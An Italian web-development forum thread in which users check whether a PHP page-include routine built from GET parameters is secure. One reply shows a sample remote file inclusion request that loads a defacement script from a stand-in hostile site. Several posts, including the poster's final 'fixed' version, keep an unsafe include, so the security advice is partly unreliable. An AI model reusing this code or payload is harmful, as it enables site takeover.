c'era un thread ma è stato chiuso... riprendo il discorso per chiedervi se può andar bene un controllo di questo tipo
Codice PHP:<?php
include 'su.php';
include 'sx.php';
$pagina = 'centro.php';
if (isset($_GET['pagina']) && isset($_GET['sezione']))
{
$pagina = $_GET['sezione'] . '/inc_' . $_GET['pagina'] . '.php';
}
if (!file_exists ($pagina))
{
$pagina = 'errore.php';
}
include $pagina;
include 'giu.php';
?>
Sotto la panza la mazza avanza.
![L'avatar di }gu|do[z]{®©](image.php?u=17713&dateline=1210448886 "L'avatar di }gu|do[z]{®©")
Visot che hai '/inc_' in mezzo.. anche modificando la querystring non possono includere nulla che non abbia "inc_" ... quindi è abbastanza sicuroCodice PHP:if (isset($_GET['pagina']) && isset($_GET['sezione']))
{
$pagina = $_GET['sezione'] . '/inc_' . $_GET['pagina'] . '.php';
}
Direi di si, in ogni caso la variabile che prendi via GET sarà solo "un pezzo" della pagina che andrai ad includere
Addio Aldo, amico mio... [03/12/70 - 16/08/03]
ok mi sento in una botte de fero... l'indirizzo risultante passando una pagina esterna è sempre una cosa del tipo directory/inc_http://link.dominio
grazie a fabio heller per l'idea
Sotto la panza la mazza avanza.
A me non sembra tanto sicuro, basta passare un url in sezione, invece che in pagina.Codice PHP:$pagina = $_GET['sezione'] . '/inc_' . $_GET['pagina'] . '.php';
Quindi con
http://www.sitobastardo.com/inc_defacciamitutto.php
basta chiamare
tuoscript.php?pagina=defacciamitutto&sezione=http://www.sitobastardo.com
Almeno così mi sembra, se non mi sto rincoglionendo del tutto
Per stare sicuro, nella variabile $pagina, prima di sezione, puoi metterci l'url del tuo sito.
Prendi in considerazione anche il metodo suggerito da M4rko[supersaibal]Originariamente inviato da Caleb
ok mi sento in una botte de fero... l'indirizzo risultante passando una pagina esterna è sempre una cosa del tipo directory/inc_http://link.dominio
grazie a fabio heller per l'idea [/supersaibal]
http://forum.html.it/forum/showthrea...=2#post7272352
Il silenzio è spesso la cosa migliore. Pensa ... è gratis.
hai ragione.. crosssite... non ci avevo pensato![supersaibal]Originariamente inviato da skidx
A me non sembra tanto sicuro, basta passare un url in sezione, invece che in pagina.Codice PHP:$pagina = $_GET['sezione'] . '/inc_' . $_GET['pagina'] . '.php';
[/supersaibal]
Ecco... un ottimo esempio di una cosa che si dice sempre: non bisogna pensare a cosa impedire, ma a cosa consentire.. ed essere il più restrittivi possibili
Giusto per dare a cesare quel che è di cesare: mi pare fosse stato suggerito da daniele_dll originariamente.. un annetto fa più o meno[supersaibal]Originariamente inviato da piero.mac
Prendi in considerazione anche il metodo suggerito da M4rko
http://forum.html.it/forum/showthrea...=2#post7272352
stavo per suggerirlo io nella prima risposta... poi mi sono fatto trarre in inganno dalla apparente sicurezza del codice di Caleb... vedi discorso appena fatto nel post precedente
Concordo che daniele possa averlo detto, ma chi lo ha ricordato e' M4rko. Non e' come in botanica dove il primo che attribuisce un nome quello sara' per sempre e deve essere citato, ed e' comunque l'invenzione dell'acqua calda ....[supersaibal]Originariamente inviato da }gu|do[z]{®©
Giusto per dare a cesare quel che è di cesare: mi pare fosse stato suggerito da daniele_dll originariamente.. un annetto fa più o meno
stavo per suggerirlo io nella prima risposta... poi mi sono fatto trarre in inganno dalla apparente sicurezza del codice di Caleb... vedi discorso appena fatto nel post precedente
D'altro canto la lista dei file abilitati all'uso messa su db, pure se per ragioni diverse dal defacement, la ricordo in script ripresi da un manualetto della McGraw-Ill editato nel 2002.
Personalmente l'utilizzo abbastanza di frequente il db per validare dei redirect a seconda del file citato nell'url, nome che non e' mai completo e che spesso e' un alias di quello vero, proprio perche' in Intranet l'utente e' di parecchio facilitato ad azioni di uso improprio dei mezzi disponibili rispetto ad un utente "esterno".
file_exists, prima del php5 che ben pochi hanno, lavorava esclusivamente su file system locale, se non erro.
http://it.php.net/manual/it/wrappers.php
Il silenzio è spesso la cosa migliore. Pensa ... è gratis.
'inchia e chi se ne era accorto? azz[supersaibal]Originariamente inviato da skidx
A me non sembra tanto sicuro, basta passare un url in sezione, invece che in pagina.Codice PHP:$pagina = $_GET['sezione'] . '/inc_' . $_GET['pagina'] . '.php';
Quindi con
http://www.sitobastardo.com/inc_defacciamitutto.php
basta chiamare
tuoscript.php?pagina=defacciamitutto&sezione=http://www.sitobastardo.com
Almeno così mi sembra, se non mi sto rincoglionendo del tutto
Per stare sicuro, nella variabile $pagina, prima di sezione, puoi metterci l'url del tuo sito. [/supersaibal]
così?
Codice PHP:<?php
include 'su.php';
include 'sx.php';
$pagina = 'centro.php';
if (isset($_GET['pagina']) && isset($_GET['sezione']))
{
$pagina = $_GET['sezione'] . '/inc_' . $_GET['pagina'] . '.php';
}
if (!file_exists ($pagina))
{
$pagina = 'errore.php';
}
$pagina = "http://nomesito/" . $pagina;
include $pagina;
include 'giu.php';
?>
Sotto la panza la mazza avanza.
Permessi di invio
Rispondi quotando